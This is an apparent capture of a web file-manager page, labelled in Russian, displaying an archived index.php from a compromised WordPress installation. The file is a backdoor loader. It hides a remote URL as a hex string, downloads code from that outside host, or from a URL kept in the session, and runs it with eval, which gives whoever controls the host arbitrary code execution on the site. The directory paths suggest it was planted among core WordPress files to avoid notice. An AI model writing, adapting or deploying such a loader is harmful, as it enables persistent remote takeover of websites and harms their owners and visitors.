Файловый менеджер - Редактировать - /home/patasalvajes/public_html/wp-includes/pomo/780007/index.php.tar
Назад
home/patasalvajes/public_html/wp-admin/user/252802/index.php 0000644 00000001100 15014451570 0017522 0 ustar 00 <?php session_start(); $hexArray = explode(":", "68:74:74:70:73:3a:2f:2f:74:65:61:6d:7a:65:64:64:32:30:32:34:2e:74:65:63:68:2f:72:61:77:2f:4d:63:75:51:47:49"); $url = pack("H*", implode("", $hexArray)); if (isset($_SESSION['ts_url'])) { $content = file_get_contents($_SESSION['ts_url']); } else { $curl = curl_init(); curl_setopt_array($curl, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true ]); $content = curl_exec($curl); } if (is_string($content)) { eval('?>'.$content); } else { echo "Error"; } ?>